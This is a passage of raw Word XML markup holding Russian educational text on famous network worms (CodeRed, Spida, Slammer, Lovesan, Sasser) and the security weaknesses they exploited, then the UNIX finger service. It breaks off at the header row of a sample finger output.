        <w:t xml:space="preserve">CodeRed </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>до сих пор продолжают распр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>страняться.</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Сетевой червь </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Spida, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">обнаруженный спустя почти год после появления </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">CodeRed, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">использовал для своего распространения открытость в </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MS SQL. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Некоторые стандартные инсталляции </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MS SQL </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">не защищали паролем системную </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">учетную запись </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">«SA», </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>позволяя любому человеку с доступом к системе через сеть запускать на ней на исполнение произвольные команды. При использовании этой уязвимости, червь открывает учетной записи «Гость» полный доступ к файлам компьютера, после чего производит загрузку самого себя на заража</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>мый сервер.</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Сетевой червь </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Slammer, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">обнаруженный в конце января 2003 года, использовал более простой способ заражения компьютеров под управлением </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">с работающим сервером </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">MS SQL, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">а именно — уязвимость при переполнении буфера в одной из подпроцедур обработки </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>UDP</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">-пакетов. Поскольку червь был достаточно мал — всего 376 байт — и использовал протокол </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">UDP, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">предназначенный для быстрой пересылки малых объемов данных, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Slammer </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">распространялся с невероятной скоростью. По некоторым оценкам, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Slammer </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">поразил порядка </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">75 </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">тысяч компьютеров по всему миру за первые </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">15 </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>минут эпидемии.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Три этих характерных сетевых червя использовали уязвимости и открытости в программах, работающих на разных версиях </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft Windows, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">в то время как обнаруженный 11 августа 2003 года червь </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Lovesan </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">использовал для своего распространения гораздо более опасную уязвимость при переполнении буфера в одном из основных компонентов самой </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Эта уязвимость по</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>д</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">робно описана в </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Microsoft Security Bulletin MS03-026.</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lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Sasser, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">впервые появившийся в мае </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">2004 </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">года, использовал еще одну уязвимость в компоненте ядра </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows, </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">в службе </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Local Security Authority Subsystem Service (LSASS). </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Информация об этой уязвимости была опубликована в </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft Security Bulletin MS04-011. Sasser </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>распространялся молниеносно и заразил миллионы компьютеров, причинив огромный финансовый ущерб.</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Разумеется, все операционные системы содержат уязвимости и открытости, которые могут быть использованы хакерами и создателями вирусов в своих целях. Хоть уязвимости </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и получают наибольшее освещение из-за о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>г</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ромного числа компьютеров, работающих под управлением этой операцио</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ной системы, свои слабые места есть и у </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>UNIX.</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Годами одним из наиболее популярных открытий в мире </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">UNIX </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">была служба </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">finger. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Эта служба позволяет пользователям вне какой-либо сети видеть, кто в настоящее время к этой сети подключен, с каких компьютеров и какие сетевые ресурсы используются. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Finger </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>полезен, но раскрывает слишком много интересной хакерам информации.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Вот пример того, как выглядит результат работы службы </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>finger:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="00FF38D0" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="810"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1392"/>
          <w:tab w:val="center" w:pos="2291"/>
          <w:tab w:val="left" w:pos="2641"/>
          <w:tab w:val="left" w:pos="3087"/>
          <w:tab w:val="right" w:pos="3965"/>
          <w:tab w:val="left" w:pos="4129"/>
          <w:tab w:val="center" w:pos="5304"/>
        </w:tabs>
        <w:spacing w:before="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="84"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Login</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="84"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>Name</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="84"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>Tty</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="84"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>Idle</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="84"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>Login</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="84"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>Time</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="84"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>Office</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="84"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>Office Phone</w:t>
      </w:r>
    </w:p>
